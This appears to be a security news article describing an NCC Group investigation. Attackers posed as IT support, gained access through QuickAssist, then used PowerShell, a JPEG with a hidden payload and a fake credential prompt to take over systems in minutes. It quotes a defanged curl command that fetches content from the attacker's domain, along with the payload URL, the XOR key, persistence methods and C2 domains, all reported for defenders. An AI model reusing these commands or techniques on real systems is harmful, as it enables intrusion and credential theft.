Hackers managed to compromise corporate systems in just five minutes using a combination of social engineering and rapid PowerShell execution.
See also: US: Chinese hackers breached up to 115 million payment cards

The incident, investigated by NCC Group 's Digital Forensics and Incident Response team , demonstrates how cybercriminals are using trusted business applications to bypass traditional security measures.
The hackers executed a carefully orchestrated campaign targeting approximately twenty users, posing as IT support staff. After successfully convincing two victims to grant remote access, the attackers exploited Windows' native remote access support tool QuickAssist.exe to establish initial access.
Within 300 seconds of gaining access, the hackers deployed a series of PowerShell that downloaded attack tools and established multiple persistence mechanisms. The attack sequence began with manipulating the clipboard using the command (curl hxxps://resutato[.]com/2-4.txt).Content | Set-Clipboard, followed by executing obfuscated PowerShell scripts.
See also: Hackers exploit link-wrapping services to steal Microsoft 365 login credentials
The main payload download was carried out via a sophisticated steganographic technique, where the malicious code was embedded within a JPEG file hosted at hxxps://resutato[.]com/b2/res/nh2.jpg. The script used XOR decryption with a 4-byte pointer (0x31, 0x67, 0xBE, 0xE1) to extract and reconstruct a ZIP file containing the components of NetSupport Manager, disguised as “NetHealth” software.

The attackers demonstrated advanced tradecraft by implementing multiple persistence mechanisms. They created scheduled tasks set to run every five minutes using regsvr32.exe with random DLL names and established persistence via the registry HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\NETHEALTH.
The malware used legitimate binaries such as msiexec.exe and GenUp.exe for DLL side-loading attacks, deploying the trojanized libcurl.dll component. Perhaps most worryingly, it deployed a sophisticated credential collection GUI that mimicked legitimate system authentication prompts
The PowerShell-based interface (C:\Users\{username}\Videos\l.ps1) created a fully overlaying screen with a convincing "Verifying System Credentials" prompt, recording the credentials in plain text to $env:TEMP\cred.txt. The interface disabled critical Windows, including access to the taskbar and various keyboard shortcuts, to prevent the user from escaping.
See also: Hackers gain initial access to organizations with RMM tools
Command and Control (C2) communication was established with multiple domains, including resutato[.]com and nimbusvaults[.]com, allowing remote administration capabilities. The success of the attack highlights the critical need for enhanced user awareness training and incident response, as even brief security breaches can lead to significant organizational compromise.
🔒 Protect your privacy with Proton VPN
Swiss VPN from the creators of Proton Mail — strict no-logs policy, strong encryption, and built-in NetShield that blocks ads, trackers, & malware.
- ✔ No-logs, based in Switzerland (except 14-Eyes)
- ✔ NetShield: blocks ads, trackers & malicious domains
- ✔ Covers all devices — free version available
The link is an affiliate link — SecNews may receive a commission at no additional cost to you. It does not affect the independence of our article writing.
